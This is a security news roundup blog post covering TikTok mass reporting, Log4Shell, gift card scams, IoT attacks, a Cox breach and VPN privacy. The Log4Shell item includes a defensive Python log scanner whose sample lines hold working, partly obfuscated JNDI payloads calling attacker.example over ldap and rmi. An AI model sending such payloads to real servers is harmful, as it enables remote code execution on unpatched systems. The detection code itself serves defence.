AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 12/10/2021

‘I need my girlfriend off TikTok’: How hackers game abuse-reporting systems

One hundred and forty-seven dollar signs fill the opening lines of the computer program. Rendered in an icy blue against a matte black background, each “$” has been carefully placed so that, all together, they spell out a name: “H4xton.” It’s a signature of sorts, and not a subtle one. Actual code doesn’t show up until a third of the way down the screen. The purpose of that code: to send a surge of content violation reports to the moderators of the wildly popular short-form video app TikTok, with the intent of getting videos removed and their creators banned. It’s a practice called “mass reporting,” and for would-be TikTok celebrities, it’s the sort of thing that keeps you up at night.


Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package

A few hours ago, a 0-day exploit in the popular Java logging library log4j was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short (CVE-2021-44228 just isn’t as memorable). The 0-day was tweeted along with a POC posted on GitHub. This has been published as CVE-2021-44228 now.
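The excerpt above says the flaw fires when log4j logs "a certain string": a JNDI lookup of the form ${jndi:<protocol>://<host>/...}, which attackers typically plant in a request header such as User-Agent so it ends up in the application log. The following scanner is an added example by the editor, not code from the quoted article or from the log4j project. It walks constructed sample access-log lines (the hostnames and paths are made up for the example), collapses the simple nested lookups used to hide the word "jndi" (${lower:}, ${upper:} and the ${key:-default} syntax), and reports the protocol and callback host of each hit.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines for this example; none come from a real incident.
# The User-Agent field is a common carrier because many apps log it verbatim.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:08:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:12:03 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:12:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:08:12:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.7 - - [10/Dec/2021:08:12:06 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.68"',
]

# Innermost-only patterns (no nested braces inside), applied repeatedly until the text stops changing.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# Log4j default-value syntax ${key:-default}; ${::-j} evaluates to the literal "j".
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup we are actually hunting for, matched after normalization.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize_lookups(text: str, max_passes: int = 10) -> str:
    """Collapse lower/upper/default lookups so an obfuscated payload reads as plain ${jndi:...}.

    Only these three forms are handled; other lookups (${env:...}, ${sys:...}, ...) are left as-is.
    """
    for _ in range(max_passes):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


@dataclass
class Finding:
    line_no: int      # 1-based index into the scanned log
    protocol: str     # ldap, ldaps, rmi, dns, ... as written in the payload
    host: str         # callback host the victim JVM would contact
    normalized: str   # the log line after lookup collapsing, for analyst review


def scan_log(lines) -> list:
    """Return one Finding per log line that contains a JNDI lookup after normalization."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        flat = normalize_lookups(line)
        m = _JNDI.search(flat)
        if m:
            findings.append(Finding(line_no, m.group(1).lower(), m.group(2), flat))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOGS):
        print(f"line {f.line_no}: JNDI lookup via {f.protocol} to {f.host}")
```

Treat a hit as a confirmed exploitation attempt and pivot to outbound connections from the logging host to the reported callback address; the scanner is a triage aid, not a substitute for upgrading log4j. Its normalizer covers only the three obfuscation forms listed in the comments, so a clean scan does not prove absence of attempts, and a payload may be split across several logged fields and only assemble inside the application.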


Scammers are tricking more people into buying gift cards

According to the newest Data Spotlight, 40,000 people reported losing a whopping $148 million in gift cards to scammers during the first nine months of 2021. Those are staggering numbers which have increased each year for the past several years. Since 2018, gift cards have been the most frequently reported payment method for fraud. But which gift card brand do scammers ask people to buy, and lose the most money on? Google Play, Apple, eBay, and Walmart cards remain popular with scammers. But this year, Target gift cards are scammers’ top choice. Most gift card scams start with a phone call from someone impersonating a branch of the government like the Social Security Administration, or a business. The caller might threaten to freeze your bank account and tell you that you must buy gift cards to avoid arrest or to keep access to your money in your bank account. They will tell you to stay on the phone as you head to the store to buy gift cards to, they often claim, solve the “problem” they are calling about. They will also ask you to provide the numbers on the back of the card you buy. These are all signs of a gift card scam.


Volume of Attacks on IoT/OT Devices Increasing

The volume of attacks on IoT and OT devices is increasing and in many cases these systems were specifically targeted by threat actors, according to a new study commissioned by Microsoft. Forty-four percent of the more than 600 respondents who took part in a survey said their organization experienced a cyber incident that involved an IoT or OT device in the past two years. Thirty-nine percent said such a device was the target of the attack and 35% said the device was leveraged to conduct a broader attack — this includes lateral movement, detection evasion and persistence. IoT and OT devices may be specifically targeted by attackers with the intent to cause disruption. One example provided by Microsoft involves human-operated ransomware attacks that disrupt production in an organization.


Cox discloses data breach after hacker impersonates support agent

Cox Communications has disclosed a data breach after a hacker impersonated a support agent to gain access to customers’ personal information. Cox Communications, aka Cox Cable, is a digital cable provider and telecommunication company that provides internet, television, and phone services in the USA. This week, customers began receiving letters in the mail disclosing that Cox Communications learned on October 11th, 2021, that “unknown person(s)” impersonated a Cox support agent to access customer information. There are not a lot of details about the security incident, but the hacker likely used a social engineering attack to gain access to Cox internal systems that provided information about customers. “On October 11, 2021, Cox learned that an unknown person(s) had impersonated a Cox agent and gained access to a small number of customer accounts. We immediately launched an internal investigation, took steps to secure the affected customer accounts, and notified law enforcement of the incident,” reads the data breach notification signed by Amber Hall, Chief Compliance and Privacy Officer of Cox Communications.


A New Report on VPNs Shows They’re Often a Mixed Bag for Privacy

By now, you’ve likely heard that virtual private networks protect your privacy. You’ve probably also heard that they don’t actually do that. Who to believe? VPNs are often sold as a way to obscure your web activity from the world because they route your internet traffic through private servers. They’ve been a part of online privacy culture since pretty much the advent of the internet. And yet, for equally as long, they’ve also been a source of contention, with ongoing questions into their efficacy and trustworthiness. Here to add to that debate is Consumer Reports, which recently published a 48-page white paper on VPNs that looks into the privacy and security policies of 16 prominent VPN providers. Researchers initially looked into some 51 different companies but ultimately homed in on the most prominent, high-quality providers. The results are decidedly mixed, with the report highlighting a lot of the long-offered criticisms of the industry—namely, its lack of transparency, its PR bullshit, and its not always stellar security practices. On the flip side, a small coterie of VPNs actually seem pretty good.
